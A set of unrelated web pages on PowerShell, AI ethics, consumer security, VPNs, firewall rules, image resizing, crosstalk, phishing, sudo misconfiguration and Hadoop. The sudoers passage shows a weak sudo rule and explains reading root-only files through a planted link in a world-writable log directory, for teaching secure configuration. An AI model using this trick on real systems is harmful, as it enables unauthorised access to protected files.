But in PowerShell, you're working with file objects, which have a length property that indicates their size. PowerShell also has a cmdlet that can do the measuring for you called, naturally, Measure-Object. In this example, you'll give it a property to measure and a parameter indicating that you want to calculate a sum based on that property:
PS C:\> dir $env:temp -rec | measure-object -property length -sum
Count : 26
Sum : 3192605
Property : length
That's not too bad and certainly helpful. But let's keep going. Measure-Object wrote an object to the pipeline with properties of Count, Average, Sum, Maximum and Minimum. If you only want to see the Sum property, you can refine your expression like this:
PS C:\> (dir $env:temp -rec | measure-object length -sum).sum
By enclosing the expression in parentheses, you're telling PowerShell to treat it as a single expression. This, in essence, is the object returned by Measure-Object, and all you need is the sum property. However, this value is in bytes. Maybe you want it in megabytes. That's simple: divide by 1MB:
PS C:\> (dir $env:temp -rec | measure-object length -sum).sum/1mb
Finally, you may want to format that number. There are several ways to do that, but the easiest is to simply round the value to an integer by telling PowerShell to treat the entire value as type [int]:
PS C:\> (dir $env:temp -rec | measure-object length -sum).sum/1mb -as [int]
With one relatively simple line of PowerShell that leverages the pipeline and objects, you get a short and sweet answer.
Jeffery Hicks is an IT veteran with over 25 years of experience, much of it spent as an IT infrastructure consultant specializing in Microsoft server technologies with an emphasis in automation and efficiency. He is a multi-year recipient of the Microsoft MVP Award in Windows PowerShell. He works today as an independent author, trainer and consultant. Jeff has written for numerous online sites and print publications, is a contributing editor at Petri.com, and a frequent speaker at technology conferences and user groups. | <urn:uuid:10278e9f-abad-4f61-98a0-5bc903b70bce> | CC-MAIN-2022-40 | https://mcpmag.com/articles/2009/03/16/surfing-pipeline.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00766.warc.gz | en | 0.926695 | 701 | 3.03125 | 3 |
Nearly nine out of 10 organizations worldwide have encountered ethical issues resulting from the use of AI.
They are asking questions such as: What does a truly robust governance structure look like? What are the clear strategies around AI? Do these policies differ between countries?
At Capgemini, we believe that ethical values need to be integrated in the applications and processes we design, build, and use. Only then can we make AI systems that people can truly trust.
What is ‘Ethical’ AI?
According to the European Commission, AI ethics is an area calling for guidelines and enabling trustworthy AI projects that comply with fundamental rights, principles, and related core values, regardless of their specific nature.
What are the challenges facing us?
- Transparent AI: As AI increasingly influences our lives, firms must provide contextual information about how AI systems operate so that people understand how decisions are made and can identify errors more easily.
- Explainable AI: As more complex use cases are built; AI must be explained in language people can understand. Thought and design are needed in the explainability of decisions produced by AI tools. Explainability of AI is vital for customer reassurance and is increasingly required by regulators.
- Robust AI: As AI systems are already being given significant autonomous decision-making power in high-stakes situations, they must be resistant to risk, unpredictability, and volatility in real-world settings. One faulty application or misplaced goal could cause the system to take action with catastrophic consequences.
- Fair AI: Since AI systems learn what they know from training data, when these datasets inaccurately mirror society, reflect unfairness or institutional prejudice, those data biases can be replicated in the resulting AI systems. We need to ensure AI systems make recommendations that do not discriminate based on race, gender, religion, or other similar factors to ensure they are representative and achieve fair outcomes for all.
- Private AI: AI systems must comply with the privacy laws that regulate data collection, use, and storage and ensure that personal information is used in accordance with the privacy standards and protected from theft.
What are the solutions?
It is important to note that there is no one-size fits all solution when it comes to addressing ethics and trust in AI – these issues are challenging and not likely to remain static. Each use case must be evaluated independently, but there are guidelines and frameworks that can start things off in the right direction.
Trusted AI Framework
Organizations must take a pointed approach to making systems ethically fit for purpose. Capgemini recommends implementing our Trusted AI framework (model below), where trust and ethics are addressed using dedicated setups, technological tools, and frameworks.
1. A bias challenge
A bank wanted to check whether its algorithm, which predicts credit risk, was unfairly discriminating against people due to their gender, race, or socioeconomic background when granting loans. They wanted to make sure the model was not turning away potential clients who were perfectly solvent.
We developed an asset called Sustainable Artificial Intelligence assistant (SAIA). It recognizes, analyzes, and corrects bias throughout pre-processing, model building, and post-processing methods. SAIA can be applied to assess bias in different AI models.
The result: an AI model that leaves these biased factors out of its decisions while still accurately assessing credit risk, and a solution that is ethical, compliant by design, and in use at the bank.
2. An Explainability Challenge
One of our clients recycles titanium, but before recycling it they check the titanium chemical composition in the laboratory. The chemical composition determines how it can be mixed with other recycled titanium alloys. Our client wanted us to determine alloy usability based on its chemical composition – a high level of explainability was required here.
Based on historical data and simulations, Capgemini proposed a model to determine whether an alloy is usable based on its chemical composition, and an optimization algorithm to find the best combinations of alloys. Using SHAP, a technique grounded in game theory's Shapley values, which measure how much each player in a collaborative game has contributed to its outcome, we provided a visual, easy-to-understand list of factors that explained the estimated usability of an alloy based on each specific chemical element.
Accuracy rates of 90% were reached for the usability classification model, which allowed our client to resell unusable alloys and thus optimize stocks and save time. A very high level of explainability was achieved, giving experts a valuable AI advisory tool, full transparency, and control over the final recycle vs resell decisions. | <urn:uuid:8e79b97f-5e56-499c-8961-b08ceadd482d> | CC-MAIN-2022-40 | https://www.capgemini.com/ca-en/service/perform-ai/trusted-ai-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00766.warc.gz | en | 0.941264 | 931 | 2.96875 | 3 |
How do you know if your online activities are secure, or if trouble is lurking around the corner? IEEE has brought together its security expert members to evaluate the most substantial threats to personal information, and to advise the public on how to best protect against security compromises online.
All of the IEEE security experts polled cited malicious software, referred to as malware, and botnets, networks of computers that have been infected and brought under the control of automated programs, as the chief security concerns for internet users. Malware includes things such as spyware and adware applications, as well as viruses and worms. These applications, once embedded in a computer, can track the surfing habits of users and redirect searches, as well as send personal information, including passwords and credit card numbers, to a third party.
“The best rule when it comes to opening email attachments is if you don’t know the user, don’t trust it,” said Prof. Matthew Bishop, IEEE member and author of the textbook, Computer Security: Art and Science. “If you have any uncertainty, contact the sender offline to verify that the email and its attachment are both genuine. Even if your trusted friend sent you the email, they could unknowingly include a virulent attachment.”
Unfortunately, it’s impossible to be completely safe from fraud or identity theft online – or offline – today, but adopting some basic measures can reduce the risk when working online. It is important to ensure that your computer is updated with the latest software security fixes, both for the operating system and applications such as your antivirus tool, web browser and email software. Additionally, it’s imperative to know how to react if personal information is compromised.
“You need to think about what could happen if the information you provide to a merchant is stolen,” said Ulf Lindqvist, IEEE Computer Society member, and head of SRI International’s support for the U.S. Department of Homeland Security’s Cyber Security Research and Development Center. “For example, make sure you know how to report fraudulent charges to the issuer of your credit card, debit card, etc., and always check your statement at least once a month and preferably every week, to ensure that there are no questionable purchases included. If you see something suspicious, report it immediately.”
As social media sites continue to grow in popularity, they are also becoming breeding grounds for fraud. Malware and botnets are oftentimes disguised as a friendly exchange from someone in a person’s network, but can unknowingly have malicious information attached to otherwise genuine online personal communications. However, the main concern with sharing information on social networking sites is that it is impossible to know where the information is going to end up – regardless of its original destination.
“People need to realize that once information is uploaded to a social networking site, it never goes away,” said Edward Delp, IEEE Fellow and chair of the Information Forensics and Security Technical Committee of the IEEE Signal Processing Society. “Never put anything on these sites that you wouldn’t want your family, prospective employers or community to see – for years to come.”
As technology changes at an exponential rate and becomes more sophisticated, it is of paramount importance that security technologies keep pace with this development. Security protocols need to stay one step ahead to thwart attacks on potential system vulnerabilities. As an international organization of the world’s most prominent thought leaders on this topic, IEEE is working to bring these influential leaders together to help prevent, detect and solve security issues. | <urn:uuid:36289b43-0cf4-48f3-b1ad-8d0cd95190a1> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2009/11/11/how-to-protect-personal-information/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00766.warc.gz | en | 0.947676 | 729 | 2.9375 | 3 |
Why AI is being Considered as the Technology of Past, Present, and Future?
Machine learning is being used by an increasing number of enterprises, meaning that AI products and applications will grow rapidly in the near future.
Fremont, CA: Artificial Intelligence (AI) has significantly influenced the corporate sector. What began as a rule-based automation system is now capable of simulating human interactions and behaviors. A powerful AI system exceeds human equivalents in terms of speed and capacity at a fraction of the cost. Thanks to technology breakthroughs, individuals are already connected to AI in some form, whether it is Siri or Alexa.
Even though machine learning is still in its early stages of development, more businesses are adopting it, signaling that AI products and applications will rise fast in the near future.
Let's see how AI is progressing today:
The health sector recognizes the relevance of AI-powered technologies in next-generation healthcare. AI is regarded as having the capacity to improve every area of healthcare operations and services. The potential economic benefits of AI in the healthcare industry, for example, are a significant driver of AI adoption.
Artificial intelligence-based innovation will be crucial in supporting individuals in preserving their well-being through continuous surveillance and coaching and assuring earlier diagnosis, individualized care, and more efficient reassessments.
Artificial intelligence (AI)-driven marketing uses technology to enhance the consumer experience. AI collects data on consumer sentiment, transactions, journeys, and everything in between, and uses it to build machine learning and prediction models of customer behavior.
The objective is to design customer acquisition and retention strategies by creating personalized content, suggestions, and communications. AI promises precise, rapid, adaptable, and human-like judgments that save money, enhance revenue and improve customer pleasure.
- Analyzing customer behavior
Humans cannot analyze all of the data generated on the internet that could be used to forecast customer behavior. In this instance, artificial intelligence is the best option, and it can provide companies with a wealth of insight into their clients' tastes. Netflix is one of the best examples of a company that uses machine learning algorithms to propose movies and shows to its customers.
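As a toy illustration of this kind of recommendation logic (an assumption-laden sketch, not Netflix's actual algorithm), the following Python snippet scores unseen titles by how similar each other user's taste is to the target user's:

```python
import math

def cosine(u: dict, v: dict) -> float:
    """Cosine similarity between two sparse rating vectors."""
    common = set(u) & set(v)
    num = sum(u[k] * v[k] for k in common)
    den = (math.sqrt(sum(x * x for x in u.values()))
           * math.sqrt(sum(x * x for x in v.values())))
    return num / den if den else 0.0

def recommend(target: str, ratings: dict, top_n: int = 3) -> list:
    """Rank titles the target user hasn't rated, weighting each
    other user's ratings by how similar their taste is."""
    scores = {}
    for other, theirs in ratings.items():
        if other == target:
            continue
        sim = cosine(ratings[target], theirs)
        for title, stars in theirs.items():
            if title not in ratings[target]:
                scores[title] = scores.get(title, 0.0) + sim * stars
    return sorted(scores, key=scores.get, reverse=True)[:top_n]
```

Real systems layer far richer models (viewing context, embeddings, sequence data) on top, but the core idea of predicting preferences from observed behavior is the same.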
In a recent study conducted by Javelin Strategy and Research, identity fraud was found to have increased 13% from 2011. One contributing factor to this increase may be the growing number of online payments and the rise of Internet fraud. As discussed in A Faceless Society Needs KBA, more consumers are using online transactions as part of their daily routine. Whether it be online shopping, online banking, or even taking polls and/or entering sweepstakes, if you are entering your personal information online you run the risk of someone else accessing it. In an infographic issued by CreditDonkey, they help to illustrate the different types of identity fraud and give tips on how to avoid it.
One way to help ensure the safety of personal information online is the use of ID verification and authentication. Businesses that help to protect their consumers' information, such as financial institutions and online retailers, need to consider partnering with an ID verification provider to strengthen prevention measures. EVS helps to ensure that someone is who he or she claims to be when entering information online. This helps to protect against thieves using stolen personal information. ID verification and authentication is the key to cutting down on identity theft online. As more companies integrate this service into their security measures, consumers will be further protected from online identity theft and Internet fraud.
One increasingly popular way that businesses, local governments, and even private citizens are strengthening their data security and privacy is by using a VPN, or virtual private network. This is a great option for many types of organizations to safely and privately surf the web and protect valuable data. But some may be confused about VPNs–after all, how does a virtual private network really work, anyway? We’ve got you covered with some of the basics about virtual private networks and how they can benefit your business or organization by ensuring better network security and privacy.
Using a VPN is a great way to browse the Internet privately, which makes it a great option for anyone looking to protect their data, IP address, and even locations. Thanks to encryption, a VPN will conceal your real IP address so you can browse anonymously, and actually use a different IP address entirely. This makes it a great feature not just for privacy, but also for cybersecurity. A virtual private network also allows you to send data safely over public WiFi, which is what makes it such a popular choice for businesses, especially ones that utilize remote employees. With a VPN, you can be sure that your most sensitive data is protected–even on a public WiFi network.
The primary reason that so many businesses and organizations rely on virtual private networks is cybersecurity. No matter what kind of data your organization needs to protect, a virtual private network is a key way you can ensure it is protected at all times–even when traveling. Many hackers will use simple methods such as WiFi spoofing to hack networks and access sensitive information. Keep your data protected and your network secure by relying on a virtual private network. VPNs are an important part of any well-rounded network security plan.
Setting Up a VPN
While a VPN protects your data using encryption and sophisticated tunneling techniques, the installation of a virtual private network is actually pretty straightforward. In fact, it can be as simple as entering a username and server address. Many large corporations and organizations rely on these networks for secure data transfer, privacy, and encryption. Prioritize your data and network security today by incorporating a virtual private network into your network security protocol.
En-Net Services Can Help Today
Experience a superior method of getting the public sector technology solutions you need through forming a partnership with En-Net Services. Our seasoned team members are familiar with the distinct purchasing and procurement cycles of state and local governments, as well as Federal, K-12 education, and higher education entities. En-Net is a certified Maryland Small Business Reserve with contract vehicles and sub-contracting partnerships to meet all contracting requirements.
To find out more about our hardware services, printing, and imaging services, or to hear more about how a dynamic team can help meet your information technology needs, send us an email or give us a call at (301)-846-9901 today!
The table in this post shows the firewall rules solution to meet the requirements in the “Firewall Rules” post. Additionally, the following list provides explanations for each of these requirements. For clarity, the rules are restated right before the explanation:
- Allow all HTTP traffic to a web server with an IP of 192.168.1.25.
Note that while HTTP traffic typically uses TCP, it can also use UDP. Because of this, IP is used as the protocol instead of TCP or UDP.
- Allow all HTTP and HTTPS traffic to a web server with an IP of 192.168.1.25.
This requires two rules. One rule allows HTTP traffic by allowing port 80, and the second rule allows HTTPS traffic by allowing port 443.
- Allow DNS queries from any source to a computer with an IP of 192.168.1.10.
DNS name resolution queries use UDP port 53.
- Block DNS zone transfer traffic from any source to any destination.
DNS zone transfers use TCP port 53.
- Block all DNS traffic from any source to any destination.
Using IP blocks both DNS name resolution queries on UDP port 53 and DNS zone transfers on TCP port 53. You could also implement this as two separate rules, one for UDP and one for TCP.
- Implement implicit deny.
The implicit deny rule is always placed last and it blocks any type of traffic from any source to any destination using any port. Note that you could also have omitted rules 4 and 5 and placed the implicit deny rule after rule 3. It would still have met the requirements but wouldn’t have stressed the difference between TCP port 53 and UDP port 53.
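To make the first-match-then-implicit-deny evaluation concrete, here is a toy Python model of the rule list above. The rule encoding is invented for the example and is not any real firewall's syntax; "ip" acts as a protocol wildcard covering both TCP and UDP, mirroring the explanations above.

```python
# Toy first-match firewall evaluator for the rules discussed above.
# Each rule: (action, protocol, port, destination); "ip", None, and "any"
# act as wildcards for protocol, port, and destination respectively.
RULES = [
    ("allow", "ip",  80,   "192.168.1.25"),  # HTTP (TCP or UDP) to the web server
    ("allow", "tcp", 443,  "192.168.1.25"),  # HTTPS to the web server
    ("allow", "udp", 53,   "192.168.1.10"),  # DNS name-resolution queries
    ("deny",  "tcp", 53,   "any"),           # DNS zone transfers
    ("deny",  "ip",  53,   "any"),           # all remaining DNS traffic
    ("deny",  "ip",  None, "any"),           # implicit deny -- always last
]

def evaluate(protocol, port, destination):
    """Return the action of the first rule that matches the packet."""
    for action, r_proto, r_port, r_dest in RULES:
        if r_proto != "ip" and r_proto != protocol:
            continue
        if r_port is not None and r_port != port:
            continue
        if r_dest != "any" and r_dest != destination:
            continue
        return action
    return "deny"

print(evaluate("tcp", 443, "192.168.1.25"))  # allow
print(evaluate("tcp", 53,  "192.168.1.10"))  # deny (zone transfer)
print(evaluate("udp", 53,  "192.168.1.10"))  # allow (DNS query)
```

Because evaluation stops at the first match, rule order carries the same significance here as it does in the table: swapping the zone-transfer deny above the DNS-query allow would change the outcome.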
Table: Firewall rules
In a recent post, we talked about the various image formats you should use when sharing images over email or online. The goal is to generate an image (or images) that are the smallest file size possible to make them easy to share and quick to download, without reducing the overall quality of the image.
How to Resize and Optimize an Image for the Web
For this example, we’re going to be using Adobe Photoshop. For the longest time, Adobe Photoshop has been the top-shelf application for image editing. There are plenty of other applications out there that can do basic edits like resizing and compressing images, and if you are more familiar with another application that is similar to Photoshop, you might be able to follow along and get the general idea of what to do.
Let’s say we have a large photo of a coffee shop that we want to put on our website. Here’s what it looks like loaded in Photoshop:
Notice the percentage next to the file name? In our example, it says 16.7%.
This means we are zoomed out to the point where the image is being displayed at only 16.7 percent of its actual size.
This doesn’t mean that some of the pixels are off-screen—Photoshop isn’t being nitpicky about that. It’s telling you that your image is zoomed out so that your computer monitor isn’t displaying all of the detail in the image.
You can zoom in and out in Photoshop a few different ways. The easiest way is to hold down CTRL and Spacebar and left-click to Zoom In and hold down CTRL, Alt, and Spacebar while left-clicking to Zoom Out.
Here’s the same image at a 100% Zoom.
As you can see, we only see a small portion of the image now that we’re looking at the image at 100 percent zoom.
What Does This Tell Us?
This image is big!
It’s important to remember that by zooming, we didn’t change the size of the image. We just changed the percentage of pixels of the image our monitor is displaying. At this zoom level, for this particular image, the image itself scales past the confines of our monitor.
This isn’t a bad thing. This means we’re working with a high quality image. There’s a lot of potential there. We could print this image and it will likely come out sharp and crisp with lots of detail. However, if we were to put this on a website, as is, it’s going to be massive. It will be larger than most users’ screens will be able to display.
It’s much bigger than it needs to be, as far as the web is concerned.
Most stock images you purchase, and most photos that come off of a modern smartphone camera or digital camera are going to be massive, as far as their dimensions go.
One important thing you need to remember before we continue—you should only shrink images down. Taking a small image and blowing it up usually requires a graphic designer, if it’s possible at all. Otherwise you’ll lose a lot of image quality.
Oh yeah, and save an original copy! We mentioned this in the last blog, but it’s worth mentioning again!
Step 1 – Determine the Size That You Need
This step can be tricky unless you have a bit of a background in graphic design. For your website, it’s going to depend on where the image is going. You may need to eyeball it, guesstimate, or even do some trial and error. There’s a pretty neat trick you can do with the Firefox browser, if you are replacing an image that’s already there.
- Load up Firefox and navigate to the page you want to put the new image.
- Right-click the image you want to replace and go to View Image Info.
- A window will pop up displaying your image and some information about it.
- Look for Dimensions. That will show you the width and height of the image in pixels.
- You can use that as a reference for the new image.
It’s also about eyeballing it. Here are some sizes you can use as a point of reference.
- 3840px is the width of a 4k Ultra HD monitor or television screen.
- 1920px is the width of a standard high definition monitor or television screen.
- 1080px is the width of most Instagram images.
- 820px is the width of a Facebook Cover Image on a desktop or most laptops.
- 272px is the width of Google’s logo in the center of Google.com on most desktops and laptops.
Here are some square images so you can get an idea of their size. Keep in mind, if you are viewing this blog on your smartphone, the sizes are going to vary a little, since our website will scale down to fit your smartphone screen. For best results, pull this blog up on your desktop.
Hopefully these references will help you out.
Step 2 – Zoom to 100% in Photoshop
In the bottom left corner of Photoshop, below your image, you’ll see the Zoom percentage. Click the percentage and set it to 100%. You can also manipulate this by Zooming In by holding down CTRL and Spacebar while left-clicking the image and Zooming Out by holding down CTRL, ALT, and Spacebar while left-clicking the image.
We’re doing this to ensure that we get a good visual example of how large or small the image is when we’re done. If you are zoomed in or out, Photoshop won’t display the image at the correct size for you. This makes it easier when you are estimating the size.
Step 3 – Resize Your Image
Click on the Image Menu and go to Image Size.
You should see this window:
While in the Image Size window:
- Make sure that the Width and Height are set to Pixels (as opposed to inches, centimeters, etc.)
- Also, make sure the brackets next to the link icon (pointing at Width and Height) are on. Clicking on the link icon will toggle this. This will ensure that you keep the same proportions of the image while you resize it.
- Type in the new width or height you want to shrink the image down to. If you change one field, the other should change with it.
- Typically, leaving Resample checked, and keeping it on Automatic will be your best bet.
- Click OK to resize your image.
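The proportional scaling that the linked Width/Height fields perform is simple arithmetic. Here is a stdlib-only Python sketch of it (an illustration of the math, not Photoshop's actual code):

```python
def scale_to_width(width, height, new_width):
    """Shrink an image's dimensions to new_width, keeping the aspect ratio."""
    ratio = new_width / width
    return new_width, round(height * ratio)

# Shrinking a 6000x4000 photo to fit a 1920px-wide HD screen:
print(scale_to_width(6000, 4000, 1920))  # (1920, 1280)
```

Photoshop's Resample option then interpolates the pixels to fit the new dimensions; the arithmetic above only decides what those dimensions are.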
Of course, if you are a graphic designer and you’ve been working in Photoshop for years, you’ll probably have your own process for doing this. We’re trying to make it as easy as possible for the average user.
Step 4 – Save Your Resized Image
Finally, it’s time to save the image.
In our last blog, we talked about the various image formats you should consider. Since we’re working with a photograph, the best format to use is JPEG.
In Photoshop, go to File > Export > Export As.
The Export As window should appear:
This will give you a preview of your image. Use the + and – icons at the bottom center to zoom in to your image to 100 percent.
On the right, under File Settings, make sure your Format is set to JPG.
Set the Quality Option by dragging the slider to the left. You’ll want to carefully examine the preview as you move the slider. If you start to notice the image degrade in quality, stop, and nudge the slider to the right.
Every image is going to be a little different, but most of the time, you should be able to set the quality somewhere between 40 and 70 percent without degrading the visible quality of the image.
This is important. That quality slider is what determines the file size of the image. Users will be able to download the image faster if the file size is as low as possible, but going too low will cause the image to look over-compressed.
The best place to look in your image for degradation is where high-contrast colors connect. Look for light and dark objects. If you lower the quality too far, you’ll start to see weird artifacting and shapes start to appear around hard edges.
Once you are ready, click Export and you’ll be prompted to give your new image a file name. Just make sure you don’t save over the original!
We hope this guide helped! For more tips and tricks, keep coming back to our blog. If you need technical support, be sure to give us a call at (610) 828-5500!
Noise and Crosstalk over Copper
Copper's susceptibility to interference and noise has been a major factor limiting the performance that can be extracted from it over the years. If not mitigated, the interference wrapped around the transmitted data can have a high impact on link reliability, on the throughput of the services riding over the link, and on the coverage that can be achieved.
Electromagnetic interference (EMI) and crosstalk are two common sources of noise within a copper environment. EMI occurs when electrical signals from the local environment outside of the binder are picked up by the copper pairs in a cable and introduce noise. Crosstalk occurs when a signal transmitted on one copper twisted pair in a bundle radiates and potentially interferes with and degrades the transmission on another pair. There are different types of crosstalk, as can be seen from the diagram below.
Advanced technologies that can effectively manage and mitigate these kinds of interferences can enable carriers to significantly increase the utilization of their copper pairs to deliver higher services to longer distances with carrier class reliability.
Learn More: Overcoming Crosstalk
One way or another, we have all nearly fallen victim to disguised scams or corrupt sites. They appear legitimate, with a valid-looking address. What's the worst that could happen?
Google phishing scams are malicious sites that send fraudulent messages which appear to come from a legitimate source.

Phishing is a punishable cybercrime that seeks to harvest personal data from any device or site. By masquerading as a trusted authority, attackers can pry into almost any data.
Attackers use different routes to snare their targets. However, the most common form of phishing is through email. We all receive spam emails and wonder how such sites could locate our email address.
Such emails masquerade as a corporate company. The scammers send emails concerning security alerts to pry into the log-in information or spy on their targets.
The most inconsistent locations are their key sources. For example, it may appear as a duplicate message from your bank or a notification message from an app.
The email often comes from a known sender asking permission to share a document.
In 2017, a major malicious attack hit the internet. A duplicate of a Google site was created, and the malicious site sent emails to almost every Gmail user asking permission to share a document.
One of the reasons the scam was quite believable was because it was posted directly on Google’s server. Thus, the URL appeared normal, but in reality, it’s a third-party site penetrating Google’s original server.
The plot was so well-crafted that many users fell for the scam. After logging in their details, the scammers had access to their personal information, including bank statements and passwords.
After an hour of wreaking havoc, the Google team was able to shut the disruptive channel down. It left users wondering how such a highly secured site could suffer so easy a lapse in security measures.
The message might state that there has been a data breach. Afterward, they ask for a log-in detail or request filling a form.
Such messages come from corrupt sources and only aim to harvest data. These scammers often seek out credit card details from a single log-in.
Below are easy ways to prevent scammers from gaining access to your data;
Most of the time, malicious sites have misspellings, and the tone of the text sounds off. The web address itself might be misspelled, with look-alike letters and numbers substituted in. If in doubt, copy and paste the address into a search engine to validate its authenticity.
Check the connection
Credible sites start with "https," which shows the connection comes from a secure network. If letters are oddly capitalized or a letter is missing, you are likely looking at a phishing website.
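The connection and spelling checks above can be sketched programmatically with Python's standard library. The heuristic and the example URLs below are illustrative only; a real check would be far more thorough.

```python
from urllib.parse import urlparse

def looks_suspicious(url):
    """Flag URLs that fail the basic checks above: scheme and odd characters."""
    parts = urlparse(url)
    if parts.scheme != "https":
        # Not an encrypted connection.
        return True
    first_label = (parts.hostname or "").split(".")[0]
    if any(c.isdigit() for c in first_label):
        # Digits posing as letters, e.g. "g00gle" (a crude heuristic --
        # some legitimate domains do contain digits).
        return True
    return False

print(looks_suspicious("http://example.com/login"))     # True
print(looks_suspicious("https://g00gle.com"))           # True
print(looks_suspicious("https://accounts.google.com"))  # False
```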
Regularly Update Web Browser
Updating your browser often builds an extra firewall against such sites. They protect your data and right in cases of cyber crimes.
Don’t click on every attachment or link
Beware of links and attachments, particularly when sent from an unidentified source in your email. Make sure the email or link is from a legitimate source before clicking.
Google phishing scams are damaging people's data globally. Still, there are ways you can protect yourself from this damage, including checking a site's spelling and connection and avoiding clicking on every attachment or link.
The following article describes common security issues regarding misconfigured sudoers’ files. The article focuses on a single entry which contains several security issues:
hacker10 ALL= (root) /bin/less /var/log/*
The article is split into the following five chapters:
- PART 1: Command Execution
- PART 2: Insecure Functionality
- PART 3: Permissions
- PART 4: Wildcards
- PART 5: Recapitulation
Another pitfall of securing “sudo” commands is file system permissions. If the permissions aren’t set correctly, an attacker might circumvent the restrictions we implemented during the last two blog posts. For the next example, the administrator changed the directory permissions for the directory “/var/log/” to “777”. Obviously, this is a bad idea for this directory and an almost unrealistic scenario. Nonetheless, this situation might appear if we use an application-specific directory which has been configured manually.
Because of the write permissions in this directory we are allowed to create arbitrary files in it. This allows us to create links to files residing in other directories. This will grant us access to the linked file once we use “less” as user root:
“less” shows us the following content when the previous command is executed:
Furthermore, ensure that the user has no write permissions on the executable.
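The link trick described above can be reproduced safely in a scratch directory. Here is a stdlib-only Python sketch; the directory layout and the fake shadow contents are invented for illustration:

```python
import os
import tempfile

tmp = tempfile.mkdtemp()
logdir = os.path.join(tmp, "var", "log")
os.makedirs(logdir)
os.chmod(logdir, 0o777)                # the misconfiguration: world-writable

secret = os.path.join(tmp, "shadow")   # stand-in for /etc/shadow
with open(secret, "w") as f:
    f.write("root:$6$not-a-real-hash")

# An attacker only needs write access to the log directory to plant a link:
os.symlink(secret, os.path.join(logdir, "app.log"))

# "sudo less /var/log/app.log" would now page through the linked file:
with open(os.path.join(logdir, "app.log")) as f:
    print(f.read())                    # root:$6$not-a-real-hash
```

Defensively, this is exactly why a sudo rule should never point at files under a directory the invoking user can write to.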
The only solution to this issue is setting appropriate permissions on the file system!
Hadoop ecosystem overview
Remember that Hadoop is a framework. If Hadoop was a house, it wouldn’t be a very comfortable place to live. It would provide walls, windows, doors, pipes, and wires. The Hadoop ecosystem provides the furnishings that turn the framework into a comfortable home for big data activity that reflects your specific needs and tastes.
The Hadoop ecosystem includes both official Apache open source projects and a wide range of commercial tools and solutions. Some of the best-known open source examples include Spark, Hive, Pig, Oozie and Sqoop. Commercial Hadoop offerings are even more diverse and include platforms and packaged distributions from vendors such as Cloudera, Hortonworks, and MapR, plus a variety of tools for specific Hadoop development, production, and maintenance tasks.
Most of the solutions available in the Hadoop ecosystem are intended to supplement one or two of Hadoop’s four core elements (HDFS, MapReduce, YARN, and Common). However, the commercially available framework solutions provide more comprehensive functionality. The sections below provide a closer look at some of the more prominent components of the Hadoop ecosystem, starting with the Apache projects
(This article is part of our Hadoop Guide. Use the right-hand menu to navigate.)
Apache open source Hadoop ecosystem elements
The Apache Hadoop project actively supports multiple projects intended to extend Hadoop’s capabilities and make it easier to use. There are several top-level projects to create development tools as well as for managing Hadoop data flow and processing. Many commercial third-party solutions build on the technologies developed within the Apache Hadoop ecosystem.
Spark, Pig, and Hive are three of the best-known Apache Hadoop projects. Each is used to create applications to process Hadoop data. While there are a lot of articles and discussions about whether Spark, Hive, or Pig is better, in practice many organizations do not use only a single one, because each is optimized for specific functions.
Spark is both a programming model and a computing model. It provides a gateway to in-memory computing for Hadoop, which is a big reason for its popularity and wide adoption. Spark provides an alternative to MapReduce that enables workloads to execute in memory, instead of on disk. Spark accesses data from HDFS but bypasses the MapReduce processing framework, and thus eliminates the resource-intensive disk operations that MapReduce requires. By using in-memory computing, Spark workloads typically run between 10 and 100 times faster compared to disk execution.
Spark can be used independently of Hadoop. However, it is used most commonly with Hadoop as an alternative to MapReduce for data processing. Spark can easily coexist with MapReduce and with other ecosystem components that perform other tasks.
Spark is also popular because it supports SQL, which helps overcome a shortcoming in core Hadoop technology. The Spark programming environment works interactively with Scala, Python, and R shells. It has been used for data extract/transform/load (ETL) operations, stream processing, machine learning development and with the Apache GraphX API for graph computation and display. Spark can run on a variety of Hadoop and non-Hadoop clusters, including Amazon S3.
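To make the map/reduce programming model that both MapReduce and Spark's RDD API build on concrete, here is a toy word count in plain Python. It illustrates the model only and involves no actual Hadoop or Spark code:

```python
from collections import defaultdict

def mapper(line):
    """Map phase: emit a (word, 1) pair for every word in a line."""
    for word in line.split():
        yield word.lower(), 1

def reducer(pairs):
    """Reduce phase: sum the counts for each key."""
    counts = defaultdict(int)
    for key, value in pairs:
        counts[key] += value
    return dict(counts)

lines = ["Hadoop stores data on disk", "Spark keeps data in memory"]
pairs = [kv for line in lines for kv in mapper(line)]
print(reducer(pairs)["data"])  # 2
```

In a real cluster the map and reduce phases run in parallel across nodes, with a shuffle step grouping pairs by key in between; MapReduce spills intermediate results to disk, while Spark keeps them in memory.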
Hive is data warehousing software that addresses how data is structured and queried in distributed Hadoop clusters. Hive is also a popular development environment that is used to write queries for data in the Hadoop environment. It provides tools for ETL operations and brings some SQL-like capabilities to the environment. Hive is a declarative language that is used to develop applications for the Hadoop environment, however it does not support real-time queries.
Hive has several components, including:
- HCatalog – Helps data processing tools read and write data on the grid. It supports MapReduce and Pig.
- WebHCat – Lets you use an HTTP/REST interface to run MapReduce, YARN, Pig, and Hive jobs.
- HiveQL – Hive’s query language intended as a way for SQL developers to easily work in Hadoop. It is similar to SQL and helps both structure and query data in distributed Hadoop clusters.
Hive queries can run from the Hive shell, JDBC, or ODBC. MapReduce (or an alternative) breaks down HiveQL statements for execution across the cluster.
Hive also allows MapReduce-compatible mapping and reduction software to perform more sophisticated functions. However, Hive does not allow row-level updates or support for real-time queries, and it is not intended for OLTP workloads. Many consider Hive to be much more effective for processing structured data than unstructured data, for which Pig is considered advantageous.
Pig is a procedural language for developing parallel processing applications for large data sets in the Hadoop environment. Pig is an alternative to Java programming for MapReduce, and automatically generates MapReduce functions. Pig includes Pig Latin, which is a scripting language. Pig translates Pig Latin scripts into MapReduce, which can then run on YARN and process data in the HDFS cluster. Pig is popular because it automates some of the complexity in MapReduce development.
Pig is commonly used for complex use cases that require multiple data operations. It is more of a processing language than a query language. Pig helps develop applications that aggregate and sort data and supports multiple inputs and exports. It is highly customizable, because users can write their own functions using their preferred scripting language. Ruby, Python and even Java are all supported. Thus, Pig has been a popular option for developers that are familiar with those languages but not with MapReduce. However, SQL developers may find Hive easier to learn.
